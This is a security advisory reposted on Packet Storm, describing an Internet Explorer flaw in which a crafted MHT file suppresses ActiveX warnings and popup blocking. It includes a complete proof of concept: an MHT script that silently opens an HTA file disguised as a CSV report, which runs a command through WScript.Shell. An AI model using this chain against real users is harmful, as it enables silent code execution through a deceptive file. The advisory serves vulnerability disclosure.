exploit the possibilities

Microsoft Internet Explorer Active-X Control Security Bypass

Microsoft Internet Explorer Active-X Control Security Bypass
Posted Dec 6, 2021
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Microsoft Internet Explorer suffers from an active-x related bypass vulnerability. Microsoft will not address the issue as it is end of life.

tags | exploit, activex, bypass
SHA-256 | fa22daaea0233f0b687f938d605627bbae7fbc5bb28632e8d17422cd0cf0af81

Microsoft Internet Explorer Active-X Control Security Bypass

Change Mirror Download
[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Microsoft Internet Explorer (MSIE)
Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.


[Vulnerability Type]
ActiveX Control Security Bypass


[CVE Reference]
N/A


[Security Issue]
Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced.
This can allow the execution of ActiveX content with zero warning to an unsuspecting end user and or force them to visit arbitrary attacker controlled websites.

By default when opening browser associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission.
Instead end users are presented with a yellow warning bar on the browsers webpage, asking first if they wish to allow the running of blocked content.
This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar.

However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and Popup blocker privacy settings.
Therefore, to bypass Internet Explorer "active content" blocking, files needs to contain an Content-Location header using an arbitrary named value E.g.

"Content-Location: PBARBAR"

Note, often times MHT files are set to open in IE by default and IE while discontinued it is still present on the Windows OS.
Tested successfully on Windows 10 latest fully patched version with default IE security settings.

Expected result: ActiveX control security warning, prevention of code execution and blocking browser popup windows.
Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement.

[PoC Requirements]
MHT file must reside on disk, think targeted attack scenarios.

[Exploit/POC]
Change [VICTIM] value below to a specified user for testing.

1) Create the MHT PoC file.

"MSIE_ActiveX_Control_Security_Bypass.mht"

From:
Subject:
Date:
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html";
boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"
This is a multi-part message in MIME format.


--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>


<script>
win=window
win.open("http://www.microsoft.com","","width=600,height=600")
var args = ['height='+1,'width='+1,].join(',')
setTimeout("", 3000)
var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv ________________________________________________________.hta', 'pop', args)
pop.moveTo(2000,2000)
</script>


</body>
</html>


--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--


2) Create the PoC HTA file.

"Sales_Report_2021.csv ________________________________________________________.hta"

<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("calc.exe")
</script>


3) Open the MHT file locally.


[Network Access]
Local


[POC/Video URL]
https://www.youtube.com/watch?v=UCSqFbYUvBk


[Disclosure Timeline]
Vendor Notification: May 13, 2019
MSRC : July 2, 2019
"We determined that a fix for this issue will be considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
December 5, 2021 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close